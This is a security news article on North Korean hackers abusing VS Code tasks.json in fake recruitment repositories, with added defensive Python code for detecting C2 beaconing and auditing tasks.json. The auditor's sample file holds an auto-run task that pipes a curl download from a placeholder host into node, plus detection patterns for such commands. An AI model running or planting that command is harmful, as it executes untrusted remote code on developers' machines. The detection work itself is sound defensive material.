North Korean Hackers Evolve Visual Studio Code Attack Methods
#Vulnerabilities


AI & ML Reporter

Jamf Threat Labs documents new infection techniques in Contagious Interview campaign exploiting VS Code configurations to deploy JavaScript backdoors.


Security researchers have identified an evolution in how North Korean state-sponsored hackers exploit Microsoft Visual Studio Code for malware deployment. The latest findings from Jamf Threat Labs reveal expanded abuse of VS Code's task configuration system in the ongoing Contagious Interview campaign, which primarily targets developers through fake job recruitment schemes.

Exploiting Development Workflows

The attack begins when targets clone malicious repositories from GitHub or GitLab under the guise of technical recruitment tests. When opened in VS Code, victims receive a prompt to trust the repository author. Granting trust triggers automatic execution of malicious commands embedded in the repository's tasks.json configuration file.

On macOS systems, this executes a background command using nohup bash -c combined with curl -s to fetch a JavaScript payload from attacker-controlled infrastructure. The payload is piped directly into Node.js, allowing execution to persist even if VS Code is closed. Recent payloads have been hosted on vercel.app domains, marking a shift from previously used infrastructure.

Threat Actors Expand Abuse of Microsoft Visual Studio Code

Deobfuscating the Payload

The JavaScript payload (SHA256: 932a67816b10a34d05a2621836cdf7fbf0628bbfdf66ae605c5f23455de1e0bc) contains significant obfuscation through unused functions and redundant logic. However, core functionality remains focused on three key capabilities:

  1. Remote Code Execution: A function allows dynamic execution of attacker-supplied JavaScript strings, including importing Node.js modules for expanded capabilities
  2. System Fingerprinting: Collects hostnames, MAC addresses, OS details, and public IPs via ipify.org
  3. Command-and-Control: Beaconing occurs every 5 seconds to a C2 server, transmitting system data and awaiting instructions
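The beaconing and fingerprinting behaviour described above is easy to spot from the defender's side, because a fixed five-second cadence with almost no jitter looks nothing like human-driven traffic. The following is an added example (not code from the article or from Jamf Threat Labs) that groups outbound connections by process and destination, measures the interval between them, and flags low-jitter short-period beacons, noting when the same process also hit a public-IP lookup service. The log format, host names and timestamps are constructed for the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample egress log (not from the report): ISO timestamp, process name, destination host.
SAMPLE_LOG = """\
2025-01-10T10:00:00 node api.ipify.org
2025-01-10T10:00:01 node c2.example.invalid
2025-01-10T10:00:06 node c2.example.invalid
2025-01-10T10:00:11 node c2.example.invalid
2025-01-10T10:00:16 node c2.example.invalid
2025-01-10T10:00:21 node c2.example.invalid
2025-01-10T10:00:26 node c2.example.invalid
2025-01-10T10:00:03 Slack slack.com
2025-01-10T10:00:45 Slack slack.com
2025-01-10T10:03:10 Slack slack.com
2025-01-10T10:00:09 git github.com
"""

# Public-IP lookup services; the article names ipify.org as the one the payload uses.
IP_LOOKUP_HOSTS = {"api.ipify.org", "ipify.org"}


def parse_log(text):
    """Parse constructed 'timestamp process host' lines into (datetime, process, host) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, proc, host = line.split()
        events.append((datetime.fromisoformat(ts), proc, host))
    return events


def detect_beacons(text, min_beacons=5, max_interval_s=10.0, max_jitter=0.2):
    """Return findings for (process, host) pairs that connect at a short, regular interval.

    Jitter is the coefficient of variation of the gaps between connections; scripted
    beacons sit near 0, while interactive applications spread widely.
    """
    events = parse_log(text)
    by_pair = defaultdict(list)
    lookup_procs = set()
    for ts, proc, host in events:
        by_pair[(proc, host)].append(ts)
        if host in IP_LOOKUP_HOSTS:
            lookup_procs.add(proc)

    findings = []
    for (proc, host), times in by_pair.items():
        if len(times) < min_beacons or host in IP_LOOKUP_HOSTS:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        median = statistics.median(gaps)
        mean = statistics.fmean(gaps)
        jitter = statistics.pstdev(gaps) / mean if mean > 0 else 0.0
        if median <= max_interval_s and jitter <= max_jitter:
            findings.append({
                "process": proc,
                "host": host,
                "count": len(times),
                "median_interval_s": median,
                "jitter": jitter,
                # A beacon preceded by a public-IP lookup matches the fingerprinting step.
                "ip_lookup_seen": proc in lookup_procs,
            })
    return findings


if __name__ == "__main__":
    for f in detect_beacons(SAMPLE_LOG):
        print(f"{f['process']} -> {f['host']}: {f['count']} connections, "
              f"median {f['median_interval_s']:.1f}s, jitter {f['jitter']:.2f}, "
              f"ip lookup seen: {f['ip_lookup_seen']}")
```

The thresholds (five connections, a median gap of ten seconds or less, jitter under 0.2) are tuning knobs; on a real host the input would be an EDR or firewall connection log rather than the constructed lines embedded here, and the process name for a payload piped into Node.js would be `node`, which is itself a useful pivot for developer workstations.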

Operational Patterns and Limitations

Approximately eight minutes after initial infection, secondary JavaScript payloads are typically delivered. These exhibit similar functionality but with notable characteristics:

  • Execution within child processes
  • Self-cleanup capabilities upon command
  • Code structure suggesting AI-assisted generation

Despite its persistence mechanism, the malware shows technical limitations. Significant portions of the payload serve no operational purpose, suggesting either deliberate obfuscation or development inefficiencies. The C2 protocol remains basic, lacking encryption or sophisticated evasion techniques.

Defense Recommendations

Developers should:

  1. Vet repositories thoroughly before granting trust in VS Code
  2. Inspect tasks.json, package.json, and install scripts in unfamiliar projects
  3. Use security solutions like Jamf Threat Prevention with Advanced Threat Controls enabled
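The second recommendation, inspecting tasks.json before trusting a repository, can be partly automated. The following is an added example (not code from the article or from Jamf) that parses a workspace's tasks.json, flags tasks configured to run automatically when the folder is opened, and looks for the pattern the article describes: a remote script fetched with curl or wget and piped straight into an interpreter, detached with nohup. The sample tasks.json and the placeholder URL in it are constructed for the example.

```python
import json
import re

# Constructed sample .vscode/tasks.json in the shape the article describes: one ordinary
# build task and one task that auto-runs on folder open and pipes a remote script into node.
SAMPLE_TASKS_JSON = r'''
{
  // VS Code reads tasks.json as JSONC, so comments like this one are legal.
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
      "group": "build"
    },
    {
      "label": "setup",
      "type": "shell",
      "command": "nohup bash -c \"curl -s https://example.invalid/p.js | node\" > /dev/null 2>&1 &",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "silent" }
    }
  ]
}
'''

# Each pattern is paired with the reason reported when it matches a task's command line.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(node|bash|sh|zsh|python3?|osascript)\b"),
     "remote fetch piped directly into an interpreter"),
    (re.compile(r"\bnohup\b"), "detaches from the editor with nohup"),
    (re.compile(r"\b(base64\s+(-d|--decode)|eval)\b"), "decodes or evals inline content"),
]


def strip_json_comments(text):
    """Remove /* */ blocks and full-line // comments so json.loads accepts JSONC input."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    return text


def task_command(task):
    """Flatten a task's command and args (string or list forms) into one string for matching."""
    cmd = task.get("command", "")
    if isinstance(cmd, list):
        cmd = " ".join(str(c) for c in cmd)
    args = task.get("args", [])
    if isinstance(args, list):
        cmd = cmd + " " + " ".join(str(a) for a in args)
    return cmd


def audit_tasks(text):
    """Return one finding per task that auto-runs on folder open or matches a suspicious pattern."""
    data = json.loads(strip_json_comments(text))
    findings = []
    for task in data.get("tasks", []):
        auto_run = task.get("runOptions", {}).get("runOn") == "folderOpen"
        cmd = task_command(task)
        reasons = [why for pattern, why in SUSPICIOUS if pattern.search(cmd)]
        if auto_run:
            reasons.insert(0, "runs automatically on folder open once the workspace is trusted")
        if not reasons:
            continue
        # Auto-run plus a suspicious command is the combination the article describes.
        severity = "high" if auto_run and len(reasons) > 1 else "medium"
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "auto_run": auto_run,
            "command": cmd.strip(),
            "reasons": reasons,
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for f in audit_tasks(SAMPLE_TASKS_JSON):
        print(f"[{f['severity']}] task '{f['label']}': {f['command']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

Run it against `.vscode/tasks.json` in any repository received as a recruitment test before clicking "trust"; a task that both auto-runs and fetches remote code should be treated as disqualifying, not merely suspicious. The same pattern list can be pointed at package.json lifecycle scripts (`preinstall`, `postinstall`) and at install shell scripts, which the article lists alongside tasks.json.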

This activity demonstrates North Korean threat actors' continued adaptation to developer environments. As Jamf Threat Labs notes, these groups consistently refine delivery mechanisms to exploit trusted development tools, requiring heightened vigilance when interacting with third-party code.

Indicators of compromise and the full technical analysis are available in Jamf's report.
